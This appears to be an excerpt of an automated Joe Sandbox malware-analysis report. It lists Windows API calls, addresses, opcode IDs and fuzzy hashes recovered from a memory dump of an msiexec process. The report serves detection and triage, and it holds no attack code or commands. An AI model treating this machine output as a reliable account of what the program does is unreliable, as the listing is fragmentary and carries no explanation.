                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1381354015-0
                                                                                                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1297977491-0
                                                                                                      • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                      • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2154303073-0
                                                                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                      APIs
                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3150196962-0
                                                                                                      • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                      • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                      APIs
                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4232544981-0
                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                      APIs
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 3859505661-0
                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                      APIs
                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumNamesResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334572018-0
                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3655998216-0
                                                                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1828521557-0
                                                                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 609303285-0
                                                                                                      • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                      • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
